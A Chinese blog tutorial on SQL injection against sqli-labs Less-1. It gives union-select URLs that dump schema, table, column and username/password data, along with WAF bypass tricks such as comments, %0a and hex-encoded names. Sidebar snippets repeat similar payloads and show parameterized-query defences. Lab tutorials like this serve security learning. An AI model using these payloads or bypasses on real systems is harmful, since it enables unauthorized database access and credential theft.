SQL注入学习之初识注入bypass(六)

最新推荐文章于 2025-03-08 19:02:25 发布
原创 最新推荐文章于 2025-03-08 19:02:25 发布 · 1.1k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#mysql #web安全 #渗透测试 #网络安全

本文介绍了在MySQL中利用Sqli-Labs进行注入技巧的学习,包括利用报错判断语句结构、联合注入、列数判断和绕过安全限制。重点演示了第一关实例,并讲解了如何通过order by、group_concat等函数进行信息泄露和数据获取。

0x00 简介

在MySQL里面注入和搭建环境来其实差不多,推荐使用sqli-labs来练练手,网上一堆的方法也是我们从学以来用到的

加引号 报错 and 1=1 and 1=2 然后SQLmap 一丢有waf就凉凉,可能and的时候就凉了,所以手工是也算个必修课吧。

直接用 and 1=1 一类的多属于 数字型注入 select * from admin where id = $id; 被包裹起来的就不行的,所以
一般要看报错的语句,当然也不是加个引号没报错就没了,具体分很多情况的。(废话多了点顺便讲清楚吧)

0x01 第一个注入

and 是一个逻辑符号 要求两边同时成立,所以and 这边是什么可以尽情发挥大家的才能 比如 and true=1 ?,为什么要这么写,因为某狗判断的就是 and 这边的字符类型
大家可以去了解了解 MySQL隐式转化。

mysql> select * from users where id = "1" and 1=1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where id = "1" and 1=2;
Empty set (0.00 sec)

说了这么多我们就拿sqli-labs的第一关来演示一下

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9WOiyoxh-1643851326034)(./img/1.6.1.png)]

看到报错语句

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

其中''1'' LIMIT 0,1' 最外层的是它出错给你的字符串不用看,所以为'1'' LIMIT 0,1 应为我们的单引号没闭合所以造成了出错 同时知道了 它的后面有个 LIMIT 0,1 所以反推大概的语句为 select x,x from xxx where x='id' limit 0,1 看到报错信息我们应该要能反推它的语句,有利于我们进一步注入,下面使用联合注入。

首先都是老套路 order by xx 来判断它的列数,因为 order by 是根据列来排序的 (排序第几列)

http://127.0.0.1/sqli/Less-1/?id=-2' union select 1,schema_name,3 from information_schema.schemata limit 2,1 -- +

通过limit 0,1来控制前端的显位的数据(从第0条取一条) 如果是过滤逗号 。 想用分页可以使用 1 offset 1 意思是从第1条开始选一条当然还有join分页这些都在后面讲了。

http://127.0.0.1/sqli/Less-1/?id=-2' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' -- +

当然你想直接爆当前的库的表 不妨这样写 table_schema=database() 为了避免单引号你也可以使用hex后的数据 table_schema=0x7365637572697479

使用group_concat() 函数把表名都聚合起来,更加方便。

http://127.0.0.1/sqli/Less-1/?id=-2' union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273 -- +

爆出字段

http://127.0.0.1/sqli/Less-1/?id=-2' union select 1,group_concat(username,0x7C,password),3 from users-- +

爆出数据 在 group_concat() 被过滤的情况下我们可以使用其他的来替换 推荐大家查阅mysql 函数表

当我们使用 information_schema.schemata 时被拦截了,我们可以这样绕过


`information_schema`.`schemata `  
information_schema/**/.schemata
information_schema/*!*/.schemata
information_schema%0a.schemata

也有人遇到过这种情况 users表被拦截 怎么绕过呢,其实也一样

security.users 数据库名 加表名

security.`users`

0x02 文末

本文如有错误,请及时提醒,避免误导他人
  • author:404
    ity.users 数据库名 加表名

security.users



# 0x02 文末

#### 本文如有错误,请及时提醒,避免误导他人
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
[网络安全自学篇] 九十四.《Windows黑客编程技术详解》之提权技术(令牌权限提升和Bypass UAC)
杨秀璋的专栏
09-12 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充相关知识点。第篇文章主要介绍木马病毒提权技术,包括进程访问令牌权限提升和Bypass UAC,希望对您有所帮助。
【WAF剖析】——sql注入之奇淫巧技bypass(持续更新中)
Demo不是emo的博客
11-24 7994
记录我自己认为的平时比较好用的bypass技巧,都是经过了实战渗透检测的,目前内容较少,会实时更新,建议收藏
我的WafBypass之路(SQL注入)
07-11
去年到现在就一直有人希望我出一篇关于waf绕过的文章,我觉得这种老生常谈的话题也没什么可写的。很多人一遇到waf就发懵,不知如何是好,能搜到的各种姿势也是然并卵。但是积累姿势的过程也是迭代的,那么就有了此文,用来总结一些学习和培养突破waf的思想。可能总结的并不全,但目的并不是讲那些网上搜来一大把的东西,So…并不会告诉大家现有的姿势,而是突破Waf Bypass思维定势达到独立去挖掘waf的设计缺陷和如何实现自动化的Waf Bypass(这里只讲主流waf的黑盒测试)
记一次SQL注入简单bypass
MachineGunJoe666
05-05 487
x00 存在 SQL 注入 总之是遇到一个站,登录的页面,数据包大致如下: POST /jsweb/userlogin/UserLoginAction.aspx HTTP/1.1Host: 115.xxx.xxx.xxx:8042Content-Length: 47Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/.
sql注入bypass方法
kwist_jay的博客
07-01 950
https://www.cnblogs.com/drkang/p/8497142.html https://www.cnblogs.com/drkang/p/8644399.html
SQL注入及其bypass
qq_45944626的博客
08-24 1884
SQL注入及其bypassSQL注入整数型注入字符型注入报错注入布尔盲注时间盲注cookie注入UA注入bypass常用函数罕见函数代替空格特殊符号绕过WAF SQL注入 整数型注入 加入单引号 语句出错,不会回显 加and 1=1 语句执行正常,返回一般页面 加and 1=2 语句正常运行,返回原网页,但无法查询结果 id=1 order by 1 查询数据库长度,若为2 id=-1 union select 1,2 查看回显位置,若为1,2,则可在1,2处添加查询语句 id=-1 unio
初识SQL注入
qq_68163788的博客
01-24 2372
SQL注入是一种常见的网络安全攻击方式,通过在应用程序的输入框中注入恶意的SQL代码,从而利用数据库系统的漏洞来执行恶意操作。攻击者可以利用SQL注入来绕过认证、访问未授权的数据、修改数据或者破坏数据库。 SQL注入通常发生在需要用户输入数据的地方,比如登录表单、搜索框、评论框等。攻击者可以在输入框中输入恶意的SQL代码,当应用程序没有对输入进行充分的验证和过滤时,这些恶意代码就会被执行,从而导致安全漏洞。 为了防止SQL注入攻击,开发人员应该使用参数化查询或者预编译语句来处理用户输入
[网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防御初探
热门推荐
杨秀璋的专栏
11-12 3万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了分享机器学习安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。这篇文章简单叙述了Web安全学习路线,并实现了最简单的木马和病毒代码,希望对读者有所帮助。
[网络安全提高篇] 一一二.DataCon Coremail邮件安全竞赛之钓鱼邮件识别及分类
杨秀璋的专栏
10-26 2万+
这是作者2020年参加清华大学、Coremail、奇安信DataCon举办的比赛,主要是关于钓鱼和异常邮件识别研究。非常感谢举办方让我们学到了新知识,DataCon也是我比较喜欢和推荐的大数据安全比赛,这篇文章2020年10月就进了我的草稿箱,但由于小珞珞刚出生,所以今天才发表,希望对您有所帮助!感恩同行,不负青春。
WEB安全--SQL注入--bypass技巧
m0_74800552的博客
02-17 820
WEB安全--SQL注入--bypass技巧
【WAF剖析】——sql注入bypass深度剖析
Demo不是emo的博客
09-05 1万+
本文分享了我自己总结的常规sql注入常规操作步骤,足够在日常sql渗透测试时使用,会不定期更新内容。
SQL注入Bypass WAF
PolarPeak的博客
06-01 4083
Best WAF Bypass 1 : order by /**/ORDER/**/BY/**/ /*!order*/+/*!by*/ /*!ORDER BY*/ /*!50000ORDER BY*/ /*!50000ORDER*//**//*!50000BY*/ /*!12345ORDER*/+/*!BY*/ UNION select /*!00000Union*/ /*!00000Select*/ /*!50000%55nIoN*/ /*!5000...
SQL注入注入姿势和Bypass
2301_79870948的博客
03-20 1533
UNION 操作符用于连接两个以上的 SELECT 语句的结果组合到一个结果集合中。前提是两个select必有相同列。注意:要用联合查询进行注入则:页面必须有显示位首先,便要判断注入点的列数,这里使用order by + 列数--+联合查询注入:这里通过查询数据表不存在的数据,从而执行后面的union语句,来获取显示位使用联合查询注入爆出敏感数据:得到了数据库名后,进行下一步,得到表名下一步,得到字段名,强调数据库名和表名可以使查到的数据更准),3--+
记一次SQL注入Bypass过程
蚁景网安学院
10-15 1075
点击关注了解更多精彩内容!!前言某日突然对肥宅的生活感到了厌倦,竟连肥宅快乐水喝起来也索然无味,我需要改变!想起胖友几天前发的一个灰色性质网站,正好测试一下打发时间。直入主题,通过访问网...
一文读懂sql注入bypass
weixin_46622976的博客
07-12 1016
SQL注入bypass
sql注入bypass
ymy13326056686的博客
02-02 631
sql注入bypass
记一次“SQL注入Bypass
xnxqwzy的博客
03-08 696
MyBatis 默认是支持OGNL 表达式的,在特定的情况下能从SQL注入转化到RCE的利用。同时在某些情况下还能绕过一些已有的安全机制。
SQL注入ByPass有点难的靶场实战】()
12-30 1559
SQL注入ByPass有点难的靶场实战】
sql注入bypass
最新发布
04-01
### SQL 注入绕过的实现与防御 #### 绕过 SQL 注入防护的技术细节 SQL 注入是一种常见的安全漏洞,攻击者可以通过输入恶意的 SQL 语句来操控数据库。为了绕过 WAF(Web 应用防火墙)或其他防护机制,通常会利用特定数据库特性和编码技巧。 1. **MySQL 特有的注释符** MySQL 支持多种注释形式,其中 `/*` 和 `*/` 是多行注释的一部分。如果 WAF 对某些关键字进行了严格匹配,则可以使用这些注释符来分割敏感字符序列[^1]。例如,在 URL 中构造请求时,可以将 `database()` 替换为 `database/**/()` 来规避检测。 2. **基于数据库管理系统的特性** 针对不同的数据库管理系统(DBMS),其语法和功能有所不同。因此,绕过策略也会因目标 DBMS 而异。核心思想是通过混淆或伪装 SQL 查询结构,使其能够避开 WAF 的过滤规则但仍能被数据库解析并执行[^2]。 3. **自动化工具的应用** 使用现成的安全测试框架如 Sqlmap 可以显著提高效率。Sqlmap 提供了 tamper 功能模块,允许用户自定义脚本来修改原始 payload,从而适应复杂的环境需求[^3]。这使得即使面对高度定制化的 WAF,也能找到潜在的突破口。 4. **具体绕过实例分析** - 利用 `%0a` 字符代替换行操作:当正则表达式中加入了 `/i` 标志表示忽略大小写时,可能遗漏掉一些特殊情况下的转义处理[^4]。比如 `'sql.php?id=1 union%0aselect 1,schema name3%0afrom /!12345information schema.schemata'` 就是一个典型例子。 - 去除冗余括号简化查询字符串:有时直接移除不必要的函数调用也可以达到目的。像这样去掉 `database()` 函数后的效果一样有效——`http://example.com/Less-1/?id=-1'union/*/!*!/*/select1,database,3--+`[^5]。 #### 如何防范 SQL 注入? 尽管上述方法展示了如何突破现有防线,但从长远来看更重要的是构建坚固可靠的防御体系: 1. **参数化查询** 推荐始终采用预编译语句或者存储过程的方式访问后台数据资源。这种方式从根本上杜绝了拼接外部可控变量进入内部逻辑的可能性。 2. **最小权限原则** 确保应用程序使用的数据库账户仅具备完成业务所需最低限度的操作权利。即便发生泄露事件也不会造成灾难性的后果。 3. **白名单验证输入** 实施严格的前端校验固然重要,但更应注重服务端层面的数据清洗工作。只接受预期范围内的值类型及长度限制有助于减少意外情况的发生概率。 4. **定期更新补丁程序** 关注官方发布的最新版本动态及时修补已知缺陷;同时部署专业的入侵检测设备密切监控异常行为模式变化趋势。 ```python # 参数化查询示例代码 import mysql.connector conn = mysql.connector.connect(user='root', password='', host='localhost', database='testdb') cursor = conn.cursor() query = ("SELECT * FROM users WHERE username=%s AND password=%s") username_input = input("Enter your Username:") password_input = input("Enter your Password:") cursor.execute(query, (username_input, password_input)) result = cursor.fetchall() print(result) ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网络安全进阶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值